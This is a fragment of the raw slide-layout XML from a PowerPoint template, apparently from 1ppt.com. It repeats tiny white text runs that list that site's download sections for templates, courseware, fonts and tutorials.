              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout47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47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47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47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48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48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48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48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48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48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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout48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48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48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48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49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49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49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49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49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49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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout49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49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49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49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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
